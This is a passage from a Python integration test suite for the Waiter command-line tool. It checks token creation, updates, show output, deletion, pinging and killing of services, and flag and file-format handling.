self.assertNotIn('--expired-instance-restart-rate', cli.stdout(cp))
self.assertNotIn('--jitter-threshold', cli.stdout(cp))
token_name = self.token_name()
cp = cli.create(self.waiter_url, token_name, create_flags=('--https-redirect true '
'--cpus 0.1 '
'--fallback-period-secs 10 '
'--idle-timeout-mins 1 '
'--max-instances 100 '
'--restart-backoff-factor 1.1 '
'--health-check-port-index 1 '
'--concurrency-level 1000 '
'--health-check-max-consecutive-failures 10 '
'--max-queue-length 1000000 '
'--expired-instance-restart-rate 0.1 '
'--jitter-threshold 0.1 '))
self.assertEqual(0, cp.returncode, cp.stderr)
try:
token = util.load_token(self.waiter_url, token_name)
self.assertTrue(token['https-redirect'])
self.assertEqual(10, token['fallback-period-secs'])
self.assertEqual(1, token['idle-timeout-mins'])
self.assertEqual(100, token['max-instances'])
self.assertEqual(1.1, token['restart-backoff-factor'])
self.assertEqual(1, token['health-check-port-index'])
self.assertEqual(1000, token['concurrency-level'])
self.assertEqual(10, token['health-check-max-consecutive-failures'])
self.assertEqual(1000000, token['max-queue-length'])
self.assertEqual(0.1, token['expired-instance-restart-rate'])
self.assertEqual(0.1, token['jitter-threshold'])
cp = cli.create(self.waiter_url, token_name, create_flags=('--https-redirect false '
'--cpus 0.1 '
'--fallback-period-secs 20 '
'--idle-timeout-mins 2 '
'--max-instances 200 '
'--restart-backoff-factor 2.2 '
'--health-check-port-index 2 '
'--concurrency-level 2000 '
'--health-check-max-consecutive-failures 2 '
'--max-queue-length 2000000 '
'--expired-instance-restart-rate 0.2 '
'--jitter-threshold 0.2 '))
self.assertEqual(0, cp.returncode, cp.stderr)
token = util.load_token(self.waiter_url, token_name)
self.assertFalse(token['https-redirect'])
self.assertEqual(20, token['fallback-period-secs'])
self.assertEqual(2, token['idle-timeout-mins'])
self.assertEqual(200, token['max-instances'])
self.assertEqual(2.2, token['restart-backoff-factor'])
self.assertEqual(2, token['health-check-port-index'])
self.assertEqual(2000, token['concurrency-level'])
self.assertEqual(2, token['health-check-max-consecutive-failures'])
self.assertEqual(2000000, token['max-queue-length'])
self.assertEqual(0.2, token['expired-instance-restart-rate'])
self.assertEqual(0.2, token['jitter-threshold'])
finally:
util.delete_token(self.waiter_url, token_name)
def test_create_help_text(self):
cp = cli.create(create_flags='--help')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('memory (in MiB) to reserve', cli.stdout(cp))
def test_cli_invalid_file_format_combo(self):
cp = cli.create(self.waiter_url, create_flags='--json test.json --yaml test.yaml')
self.assertEqual(2, cp.returncode, cp.stderr)
self.assertIn('not allowed with argument', cli.stderr(cp))
cp = cli.update(self.waiter_url, update_flags='--json test.json --yaml test.yaml')
self.assertEqual(2, cp.returncode, cp.stderr)
self.assertIn('not allowed with argument', cli.stderr(cp))
token_name = self.token_name()
cp = cli.show(self.waiter_url, token_name, show_flags='--json --yaml')
self.assertEqual(2, cp.returncode, cp.stderr)
self.assertIn('not allowed with argument', cli.stderr(cp))
cp = cli.tokens(self.waiter_url, tokens_flags='--json --yaml')
self.assertEqual(2, cp.returncode, cp.stderr)
self.assertIn('not allowed with argument', cli.stderr(cp))
def test_implicit_update_args(self):
cp = cli.create(create_flags='--help')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('--cpus', cli.stdout(cp))
self.assertNotIn('--https-redirect', cli.stdout(cp))
self.assertNotIn('--fallback-period-secs', cli.stdout(cp))
self.assertNotIn('--idle-timeout-mins', cli.stdout(cp))
self.assertNotIn('--max-instances', cli.stdout(cp))
self.assertNotIn('--restart-backoff-factor', cli.stdout(cp))
token_name = self.token_name()
cp = cli.update(self.waiter_url, token_name, update_flags='--https-redirect true '
'--cpus 0.1 '
'--fallback-period-secs 10 '
'--idle-timeout-mins 1 '
'--max-instances 100 '
'--restart-backoff-factor 1.1')
self.assertEqual(0, cp.returncode, cp.stderr)
try:
token = util.load_token(self.waiter_url, token_name)
self.assertTrue(token['https-redirect'])
self.assertEqual(10, token['fallback-period-secs'])
self.assertEqual(1, token['idle-timeout-mins'])
self.assertEqual(100, token['max-instances'])
self.assertEqual(1.1, token['restart-backoff-factor'])
cp = cli.update(self.waiter_url, token_name, update_flags='--https-redirect false '
'--cpus 0.1 '
'--fallback-period-secs 20 '
'--idle-timeout-mins 2 '
'--max-instances 200 '
'--restart-backoff-factor 2.2')
self.assertEqual(0, cp.returncode, cp.stderr)
token = util.load_token(self.waiter_url, token_name)
self.assertFalse(token['https-redirect'])
self.assertEqual(20, token['fallback-period-secs'])
self.assertEqual(2, token['idle-timeout-mins'])
self.assertEqual(200, token['max-instances'])
self.assertEqual(2.2, token['restart-backoff-factor'])
finally:
util.delete_token(self.waiter_url, token_name)
def test_basic_show(self):
token_name = self.token_name()
cp = cli.show(self.waiter_url, token_name)
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('No matching data found', cli.stdout(cp))
token_definition = {
'cmd-type': 'shell',
'health-check-url': '/foo',
'min-instances': 1,
'max-instances': 2,
'permitted-user': '*',
'mem': 1024
}
util.post_token(self.waiter_url, token_name, token_definition)
try:
token = util.load_token(self.waiter_url, token_name)
self.assertIsNotNone(token)
cp = cli.show(self.waiter_url, token_name)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('Command type', cli.stdout(cp))
self.assertIn('Health check endpoint', cli.stdout(cp))
self.assertIn('Minimum instances', cli.stdout(cp))
self.assertIn('Maximum instances', cli.stdout(cp))
self.assertIn('Permitted user(s)', cli.stdout(cp))
self.assertIn(f'=== {self.waiter_url} / {token_name} ===', cli.stdout(cp))
self.assertIn('1 GiB', cli.stdout(cp))
finally:
util.delete_token(self.waiter_url, token_name)
def test_implicit_show_fields(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, {'cpus': 0.1, 'https-redirect': True, 'fallback-period-secs': 10})
try:
cp = cli.show(self.waiter_url, token_name)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('Https redirect', cli.stdout(cp))
self.assertIn('Fallback period (seconds)', cli.stdout(cp))
finally:
util.delete_token(self.waiter_url, token_name)
def test_show_no_cluster(self):
config = {'clusters': []}
with cli.temp_config_file(config) as path:
flags = '--config %s' % path
cp = cli.show(token_name=self.token_name(), flags=flags)
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('must specify at least one cluster', cli.decode(cp.stderr))
def __test_show(self, file_format):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, {'cpus': 0.1})
try:
cp, tokens = cli.show_token(file_format, self.waiter_url, token_name)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertEqual(1, len(tokens))
self.assertEqual(util.load_token(self.waiter_url, token_name), tokens[0])
finally:
util.delete_token(self.waiter_url, token_name)
def test_show_json(self):
self.__test_show('json')
def test_show_yaml(self):
self.__test_show('yaml')
@pytest.mark.serial
def test_create_if_match(self):
def encountered_stale_token_error(cp):
self.logger.info(f'Return code: {cp.returncode}, output: {cli.output(cp)}')
assert 1 == cp.returncode
assert 'stale token' in cli.decode(cp.stderr)
return True
token_name = self.token_name()
keep_running = True
def update_token_loop():
mem = 1
while keep_running:
util.post_token(self.waiter_url, token_name, {'mem': mem}, assert_response=False)
mem += 1
util.post_token(self.waiter_url, token_name, {'cpus': 0.1})
thread = threading.Thread(target=update_token_loop)
try:
thread.start()
util.wait_until(lambda: cli.create_minimal(self.waiter_url, token_name),
encountered_stale_token_error,
wait_interval_ms=0)
finally:
keep_running = False
thread.join()
self.logger.info('Thread finished')
util.delete_token(self.waiter_url, token_name)
@unittest.skipIf('WAITER_TEST_CLI_COMMAND' in os.environ, 'waiter executable may be unknown.')
def test_base_config_file(self):
token_name = self.token_name()
cluster_name_1 = str(uuid.uuid4())
config = {'clusters': [{"name": cluster_name_1, "url": self.waiter_url}]}
with cli.temp_base_config_file(config):
# Use entry in base config file
cp = cli.create_minimal(token_name=token_name)
self.assertEqual(0, cp.returncode, cp.stderr)
try:
self.assertIn(f'on {cluster_name_1}', cli.decode(cp.stdout))
# Overwrite "base" with specified config file
cluster_name_2 = str(uuid.uuid4())
config = {'clusters': [{"name": cluster_name_2, "url": self.waiter_url}]}
with cli.temp_config_file(config) as path:
# Verify "base" config is overwritten
flags = '--config %s' % path
cp = cli.create_minimal(token_name=token_name, flags=flags)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn(f'on {cluster_name_2}', cli.decode(cp.stdout))
finally:
util.delete_token(self.waiter_url, token_name)
def test_avoid_exit_on_connection_error(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, {'cpus': 0.1})
try:
config = {'clusters': [{'name': 'foo', 'url': self.waiter_url},
{'name': 'bar', 'url': 'http://localhost:65535'}]}
with cli.temp_config_file(config) as path:
flags = f'--config {path}'
cp, tokens = cli.show_token('json', token_name=token_name, flags=flags)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertEqual(1, len(tokens), tokens)
self.assertEqual(util.load_token(self.waiter_url, token_name), tokens[0])
self.assertIn('Encountered connection error with bar', cli.decode(cp.stderr), cli.output(cp))
finally:
util.delete_token(self.waiter_url, token_name)
def test_show_env(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, {'env': {'FOO': '1', 'BAR': 'baz'}})
try:
cp = cli.show(self.waiter_url, token_name)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('Environment:\n', cli.stdout(cp))
self.assertNotIn('Env ', cli.stdout(cp))
finally:
util.delete_token(self.waiter_url, token_name)
def test_delete_basic(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, {'cpus': 0.1})
try:
cp = cli.delete(self.waiter_url, token_name)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('Deleting token', cli.stdout(cp))
self.assertIn('Successfully deleted', cli.stdout(cp))
resp_json = util.load_token(self.waiter_url, token_name, expected_status_code=404)
self.assertIn('waiter-error', resp_json)
finally:
util.delete_token(self.waiter_url, token_name, assert_response=False)
def test_delete_single_service(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, util.minimal_service_description())
try:
self.logger.info(f'Token: {util.load_token(self.waiter_url, token_name)}')
service_id = util.ping_token(self.waiter_url, token_name)
try:
cp = cli.delete(self.waiter_url, token_name)
self.assertEqual(1, cp.returncode, cli.output(cp))
self.assertIn('There is one service using token', cli.stderr(cp))
self.assertIn('Please kill this service before deleting the token', cli.stderr(cp))
self.assertIn(service_id, cli.stderr(cp))
finally:
util.kill_service(self.waiter_url, service_id)
finally:
util.delete_token(self.waiter_url, token_name)
def test_delete_multiple_services(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, util.minimal_service_description())
try:
self.logger.info(f'Token: {util.load_token(self.waiter_url, token_name)}')
service_id_1 = util.ping_token(self.waiter_url, token_name)
try:
util.post_token(self.waiter_url, token_name, util.minimal_service_description())
self.logger.info(f'Token: {util.load_token(self.waiter_url, token_name)}')
service_id_2 = util.ping_token(self.waiter_url, token_name)
try:
services_for_token = util.services_for_token(self.waiter_url, token_name)
self.logger.info(f'Services for token {token_name}: {json.dumps(services_for_token, indent=2)}')
cp = cli.delete(self.waiter_url, token_name)
self.assertEqual(1, cp.returncode, cli.output(cp))
self.assertIn('There are 2 services using token', cli.stderr(cp))
self.assertIn('Please kill these services before deleting the token', cli.stderr(cp))
self.assertIn(service_id_1, cli.stderr(cp))
self.assertIn(service_id_2, cli.stderr(cp))
finally:
util.kill_service(self.waiter_url, service_id_2)
finally:
util.kill_service(self.waiter_url, service_id_1)
finally:
util.delete_token(self.waiter_url, token_name)
@pytest.mark.serial
def test_delete_if_match(self):
def encountered_stale_token_error(cp):
self.logger.info(f'Return code: {cp.returncode}, output: {cli.output(cp)}')
assert 1 == cp.returncode
assert 'stale token' in cli.decode(cp.stderr)
return True
token_name = self.token_name()
keep_running = True
def update_token_loop():
mem = 1
while keep_running:
util.post_token(self.waiter_url, token_name, {'mem': mem}, assert_response=False)
mem += 1
util.post_token(self.waiter_url, token_name, {'cpus': 0.1})
thread = threading.Thread(target=update_token_loop)
try:
thread.start()
util.wait_until(lambda: cli.delete(self.waiter_url, token_name),
encountered_stale_token_error,
wait_interval_ms=0)
finally:
keep_running = False
thread.join()
self.logger.info('Thread finished')
util.delete_token(self.waiter_url, token_name, assert_response=False)
def test_delete_non_existent_token(self):
token_name = self.token_name()
cp = cli.delete(self.waiter_url, token_name)
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('No matching data found', cli.stdout(cp))
def test_ping_basic(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, util.minimal_service_description())
try:
self.assertEqual(0, len(util.services_for_token(self.waiter_url, token_name)))
cp = cli.ping(self.waiter_url, token_name)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('Pinging token', cli.stdout(cp))
self.assertIn('successful', cli.stdout(cp))
self.assertIn('Service is currently', cli.stdout(cp))
self.assertTrue(any(s in cli.stdout(cp) for s in ['Running', 'Starting']))
util.wait_until_services_for_token(self.waiter_url, token_name, 1)
finally:
util.delete_token(self.waiter_url, token_name, kill_services=True)
def test_ping_error(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, {'cpus': 0.1})
try:
self.assertEqual(0, len(util.services_for_token(self.waiter_url, token_name)))
cp = cli.ping(self.waiter_url, token_name)
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('Pinging token', cli.stdout(cp))
self.assertEqual(0, len(util.services_for_token(self.waiter_url, token_name)))
finally:
util.delete_token(self.waiter_url, token_name, kill_services=True)
def test_ping_non_existent_token(self):
token_name = self.token_name()
cp = cli.ping(self.waiter_url, token_name)
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('No matching data found', cli.stdout(cp))
def test_ping_custom_health_check_endpoint(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, util.minimal_service_description(**{'health-check-url': '/sleep'}))
try:
self.assertEqual(0, len(util.services_for_token(self.waiter_url, token_name)))
cp = cli.ping(self.waiter_url, token_name)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('Pinging token', cli.stdout(cp))
self.assertEqual(1, len(util.services_for_token(self.waiter_url, token_name)))
finally:
util.delete_token(self.waiter_url, token_name, kill_services=True)
def test_kill_basic(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, util.minimal_service_description())
try:
service_id = util.ping_token(self.waiter_url, token_name)
self.assertEqual(1, len(util.services_for_token(self.waiter_url, token_name)))
cp = cli.kill(self.waiter_url, token_name, flags="-v")
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('Killing service', cli.stdout(cp))
self.assertIn(service_id, cli.stdout(cp))
self.assertIn('Successfully killed', cli.stdout(cp))
self.assertIn('timeout=30000', cli.stderr(cp))
self.assertNotIn('Pinging service', cli.stdout(cp))
self.assertNotIn('Pinging token', cli.stdout(cp))
util.wait_until_no_services_for_token(self.waiter_url, token_name)
finally:
util.delete_token(self.waiter_url, token_name, kill_services=True)
def test_kill_token_and_then_ping(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, util.minimal_service_description())
try:
service_id = util.ping_token(self.waiter_url, token_name)
self.assertEqual(1, len(util.services_for_token(self.waiter_url, token_name)))
cp = cli.kill(self.waiter_url, token_name, flags="-v", kill_flags="--ping")
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('Killing service', cli.stdout(cp))
self.assertIn(service_id, cli.stdout(cp))
self.assertIn('Successfully killed', cli.stdout(cp))
self.assertIn('timeout=30000', cli.stderr(cp))
self.assertIn('Pinging token', cli.stdout(cp))
self.assertIn('Ping successful', cli.stdout(cp))
self.assertEqual(1, len(util.wait_until_services_for_token(self.waiter_url, token_name, 1)))
finally:
util.delete_token(self.waiter_url, token_name, kill_services=True)
def test_kill_no_services(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, util.minimal_service_description())
try:
cp = cli.kill(self.waiter_url, token_name)
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('There are no services using token', cli.stdout(cp))
self.assertNotIn('Pinging service', cli.stdout(cp))
self.assertNotIn('Pinging token', cli.stdout(cp))
finally:
util.delete_token(self.waiter_url, token_name)
def test_kill_timeout(self):
timeout = 10
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, util.minimal_service_description())
try:
service_id = util.ping_token(self.waiter_url, token_name)
self.assertEqual(1, len(util.services_for_token(self.waiter_url, token_name)))
cp = cli.kill(self.waiter_url, token_name, flags="-v", kill_flags=f"--timeout {timeout}")
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('Killing service', cli.stdout(cp))
self.assertIn(service_id, cli.stdout(cp))
self.assertIn('Successfully killed', cli.stdout(cp))
self.assertNotIn('Pinging service', cli.stdout(cp))
self.assertNotIn('Pinging token', cli.stdout(cp))
self.assertIn(f'timeout={timeout * 1000}', cli.stderr(cp))
util.wait_until_no_services_for_token(self.waiter_url, token_name)
finally:
util.delete_token(self.waiter_url, token_name, kill_services=True)
def test_kill_multiple_services(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, util.minimal_service_description())
try:
service_id_1 = util.ping_token(self.waiter_url, token_name)
util.post_token(self.waiter_url, token_name, util.minimal_service_description())
service_id_2 = util.ping_token(self.waiter_url, token_name)
self.assertEqual(2, len(util.services_for_token(self.waiter_url, token_name)))
cp = cli.kill(self.waiter_url, token_name, kill_flags='--force')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('There are 2 services using token', cli.stdout(cp))
self.assertEqual(2, cli.stdout(cp).count('Killing service'))
self.assertEqual(2, cli.stdout(cp).count('Successfully killed'))
self.assertIn(service_id_1, cli.stdout(cp))
self.assertIn(service_id_2, cli.stdout(cp))
self.assertNotIn('Pinging service', cli.stdout(cp))
self.assertNotIn('Pinging token', cli.stdout(cp))
util.wait_until_no_services_for_token(self.waiter_url, token_name)
finally:
util.delete_token(self.waiter_url, token_name, kill_services=True)
@pytest.mark.xfail
def test_kill_services_sorted(self):
token_name = self.token_name()
service_description_1 = util.minimal_service_description()
util.post_token(self.waiter_url, token_name, service_description_1)
try:
# Create two services for the token
service_id_1 = util.ping_token(self.waiter_url, token_name)
service_description_2 = util.minimal_service_description()
util.post_token(self.waiter_url, token_name, service_description_2)
service_id_2 = util.ping_token(self.waiter_url, token_name)
# Kill the two services and assert the sort order
cp = cli.kill(self.waiter_url, token_name, kill_flags='--force')
stdout = cli.stdout(cp)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn(service_id_1, stdout)
self.assertIn(service_id_2, stdout)
self.assertLess(stdout.index(service_id_2), stdout.index(service_id_1))
self.assertNotIn('Pinging service', stdout)
self.assertNotIn('Pinging token', cli.stdout(cp))
util.wait_until_routers_recognize_service_killed(self.waiter_url, service_id_1)
util.wait_until_routers_recognize_service_killed(self.waiter_url, service_id_2)
# Re-create the same two services, in the opposite order
util.post_token(self.waiter_url, token_name, service_description_2)
util.ping_token(self.waiter_url, token_name)
util.post_token(self.waiter_url, token_name, service_description_1)
util.ping_token(self.waiter_url, token_name)
# Kill the two services and assert the (different) sort order
cp = cli.kill(self.waiter_url, token_name, kill_flags='--force')
stdout = cli.stdout(cp)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn(service_id_1, stdout)
self.assertIn(service_id_2, stdout)
self.assertLess(stdout.index(service_id_1), stdout.index(service_id_2))
finally:
util.delete_token(self.waiter_url, token_name, kill_services=True)
def test_ping_timeout(self):
token_name = self.token_name()
command = f'{util.default_cmd()} --start-up-sleep-ms 20000'
util.post_token(self.waiter_url, token_name, util.minimal_service_description(cmd=command))
try:
cp = cli.ping(self.waiter_url, token_name, ping_flags='--timeout 300')
self.assertEqual(0, cp.returncode, cp.stderr)
util.kill_services_using_token(self.waiter_url, token_name)
cp = cli.ping(self.waiter_url, token_name, ping_flags='--timeout 10')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertTrue(
# Either Waiter will inform us that the ping timed out
'Ping request timed out' in cli.stderr(cp) or
# Or, the read from Waiter will time out
'Encountered error while pinging' in cli.stderr(cp))
finally:
util.kill_services_using_token(self.waiter_url, token_name)
util.delete_token(self.waiter_url, token_name)
def test_ping_service_id(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, util.minimal_service_description())
try:
service_id = util.ping_token(self.waiter_url, token_name)
util.kill_services_using_token(self.waiter_url, token_name)
self.assertEqual(0, len(util.services_for_token(self.waiter_url, token_name)))
cp = cli.ping(self.waiter_url, service_id, ping_flags='--service-id')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('Pinging service', cli.stdout(cp))
self.assertEqual(1, len(util.services_for_token(self.waiter_url, token_name)))
finally:
util.delete_token(self.waiter_url, token_name, kill_services=True)
def test_ping_invalid_args(self):
cp = cli.ping(self.waiter_url)
self.assertEqual(2, cp.returncode, cp.stderr)
self.assertIn('the following arguments are required: token-or-service-id', cli.stderr(cp))
def test_ping_correct_endpoint(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name,
util.minimal_service_description(**{'health-check-url': '/sleep'}))
try:
# Grab the service id for the /sleep version
service_id = util.ping_token(self.waiter_url, token_name)
# Update the health check url to /status
util.post_token(self.waiter_url, token_name,
util.minimal_service_description(**{'health-check-url': '/status'}))
# Pinging the token should use /status
cp = cli.ping(self.waiter_url, token_name)
self.assertEqual(0, cp.returncode, cp.stderr)
# Pinging the service id should use /sleep
cp = cli.ping(self.waiter_url, service_id, ping_flags='--service-id')
self.assertEqual(0, cp.returncode, cp.stderr)
finally:
util.delete_token(self.waiter_url, token_name, kill_services=True)
def test_ping_no_wait(self):
token_name = self.token_name()
command = f'{util.default_cmd()} --start-up-sleep-ms {util.DEFAULT_TEST_TIMEOUT_SECS * 2 * 1000}'
util.post_token(self.waiter_url, token_name, util.minimal_service_description(cmd=command))
try:
cp = cli.ping(self.waiter_url, token_name, ping_flags='--no-wait')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('Service is currently Starting', cli.stdout(cp))
services_for_token = util.wait_until_services_for_token(self.waiter_url, token_name, 1)
service_id = services_for_token[0]['service-id']
util.kill_services_using_token(self.waiter_url, token_name)
cp = cli.ping(self.waiter_url, service_id, ping_flags='--service-id --no-wait')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('Service is currently Starting', cli.stdout(cp))
util.wait_until_services_for_token(self.waiter_url, token_name, 1)
util.kill_services_using_token(self.waiter_url, token_name)
util.post_token(self.waiter_url, token_name, {'cpus': 0.1, 'cmd-type': 'shell'})
cp = cli.ping(self.waiter_url, token_name, ping_flags='--no-wait')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertNotIn('Service is currently', cli.stdout(cp))
self.assertIn('Service description', cli.decode(cp.stderr))
self.assertIn('improper', cli.decode(cp.stderr))
self.assertIn('cmd must be a non-empty string', cli.decode(cp.stderr))
self.assertIn('version must be a non-empty string', cli.decode(cp.stderr))
self.assertIn('mem must be a positive number', cli.decode(cp.stderr))
util.wait_until_no_services_for_token(self.waiter_url, token_name)
finally:
util.kill_services_using_token(self.waiter_url, token_name)
util.delete_token(self.waiter_url, token_name)
def test_ping_deployment_errors(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, util.minimal_service_description(**{'cmd': 'asdfasdfafsdhINVALIDCOMMAND'}))
try:
self.assertEqual(0, len(util.services_for_token(self.waiter_url, token_name)))
cp = cli.ping(self.waiter_url, token_name)
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('Pinging token', cli.stdout(cp))
self.assertIn('Ping responded with non-200 status 503.', cli.stderr(cp))
self.assertIn('Deployment error: Invalid startup command', cli.stderr(cp))
self.assertEqual(1, len(util.services_for_token(self.waiter_url, token_name)))
finally:
util.delete_token(self.waiter_url, token_name, kill_services=True)
def test_create_does_not_patch(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, {'cpus': 0.1})
try:
cp = cli.create_from_service_description(self.waiter_url, token_name, {'mem': 128})
self.assertEqual(0, cp.returncode, cp.stderr)
token_data = util.load_token(self.waiter_url, token_name)
self.assertFalse('cpus' in token_data)
self.assertEqual(128, token_data['mem'])
finally:
util.delete_token(self.waiter_url, token_name)
def test_update_does_patch(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, {'cpus': 0.1})
try:
cp = cli.update_from_service_description(self.waiter_url, token_name, {'mem': 128})
self.assertEqual(0, cp.returncode, cp.stderr)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(0.1, token_data['cpus'])
self.assertEqual(128, token_data['mem'])
finally:
util.delete_token(self.waiter_url, token_name)
def __test_create_token(self, file_format, input_flag=None):
if input_flag is None:
input_flag = file_format
create_fields = {'cpus': 0.1, 'mem': 128}
stdin = cli.dump(file_format, create_fields)
token_name = self.token_name()
cp = cli.create(self.waiter_url, token_name, create_flags=f'--{input_flag} -', stdin=stdin)
self.assertEqual(0, cp.returncode, cp.stderr)
try:
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(0.1, token_data['cpus'])
self.assertEqual(128, token_data['mem'])
# Test with data from a file
util.delete_token(self.waiter_url, token_name)
with cli.temp_token_file(create_fields, file_format) as path:
cp = cli.create(self.waiter_url, token_name, create_flags=f'--{input_flag} {path}')
self.assertEqual(0, cp.returncode, cp.stderr)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(0.1, token_data['cpus'])
self.assertEqual(128, token_data['mem'])
finally:
util.delete_token(self.waiter_url, token_name)
def test_create_token_json(self):
self.__test_create_token('json')
def test_create_token_yaml(self):
self.__test_create_token('yaml')
def test_create_token_json_input(self):
self.__test_create_token('json', 'input')
def test_create_token_yaml_input(self):
self.__test_create_token('yaml', 'input')
def __test_update_token(self, file_format):
token_name = self.token_name()
create_fields = {'cpus': 0.1, 'mem': 128, 'cmd': 'foo'}
update_fields = {'cpus': 0.2, 'mem': 256}
util.post_token(self.waiter_url, token_name, create_fields)
try:
stdin = cli.dump(file_format, update_fields)
cp = cli.update(self.waiter_url, token_name, update_flags=f'--{file_format} -', stdin=stdin)
self.assertEqual(0, cp.returncode, cp.stderr)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(0.2, token_data['cpus'])
self.assertEqual(256, token_data['mem'])
self.assertEqual('foo', token_data['cmd'])
# Test with data from a file
util.post_token(self.waiter_url, token_name, create_fields)
with cli.temp_token_file(update_fields, file_format) as path:
cp = cli.update(self.waiter_url, token_name, update_flags=f'--{file_format} {path}')
self.assertEqual(0, cp.returncode, cp.stderr)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(0.2, token_data['cpus'])
self.assertEqual(256, token_data['mem'])
self.assertEqual('foo', token_data['cmd'])
finally:
util.delete_token(self.waiter_url, token_name)
def test_update_token_json(self):
self.__test_update_token('json')
def test_update_token_yaml(self):
self.__test_update_token('yaml')
def __test_post_token_and_flags(self, file_format):
token_name = self.token_name()
update_fields = {'cpus': 0.2, 'mem': 256}
with cli.temp_token_file(update_fields, file_format) as path:
cp = cli.update(self.waiter_url, token_name,
update_flags=f'--{file_format} {path} --cpus 0.1')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('cannot specify the same parameter in both an input file and token field flags at the '
'same time (cpus)', cli.stderr(cp))
cp = cli.update(self.waiter_url, token_name,
update_flags=f'--{file_format} {path} --mem 128')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('cannot specify the same parameter in both an input file and token field flags at the '
'same time (mem)', cli.stderr(cp))
cp = cli.update(self.waiter_url, token_name,
update_flags=f'--{file_format} {path} --cpus 0.1 --mem 128')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('cannot specify the same parameter in both an input file and token field flags',
cli.stderr(cp))
self.assertIn('cpus', cli.stderr(cp))
self.assertIn('mem', cli.stderr(cp))
try:
cp = cli.update(self.waiter_url, token_name,
update_flags=f'--{file_format} {path} --name foo --image bar')
self.assertEqual(0, cp.returncode, cp.stderr)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(0.2, token_data['cpus'])
self.assertEqual(256, token_data['mem'])
self.assertEqual('foo', token_data['name'])
self.assertEqual('bar', token_data['image'])
finally:
util.delete_token(self.waiter_url, token_name)
def test_post_token_json_and_flags(self):
self.__test_post_token_and_flags('json')
def test_post_token_yaml_and_flags(self):
self.__test_post_token_and_flags('yaml')
def __test_post_token_invalid(self, file_format):
token_name = self.token_name()
stdin = json.dumps([]).encode('utf8')
cp = cli.update(self.waiter_url, token_name, update_flags=f'--{file_format} -', stdin=stdin)
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn(f'Input {file_format.upper()} must be a dictionary', cli.stderr(cp))
stdin = '{"mem": 128'.encode('utf8')
cp = cli.update(self.waiter_url, token_name, update_flags=f'--{file_format} -', stdin=stdin)
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn(f'Malformed {file_format.upper()}', cli.stderr(cp))
with tempfile.NamedTemporaryFile(delete=True) as file:
cp = cli.update(self.waiter_url, token_name, update_flags=f'--{file_format} {file.name}')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn(f'Unable to load {file_format.upper()} from', cli.stderr(cp))
def test_post_token_json_invalid(self):
self.__test_post_token_invalid('json')
def test_post_token_yaml_invalid(self):
self.__test_post_token_invalid('yaml')
def test_kill_service_id(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, util.minimal_service_description())
try:
service_id = util.ping_token(self.waiter_url, token_name)
self.assertEqual(1, len(util.services_for_token(self.waiter_url, token_name)))
cp = cli.kill(self.waiter_url, service_id, kill_flags='--service-id')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('Killing service', cli.stdout(cp))
self.assertNotIn('Pinging service', cli.stdout(cp))
self.assertNotIn('Pinging token', cli.stdout(cp))
util.wait_until_no_services_for_token(self.waiter_url, token_name)
finally:
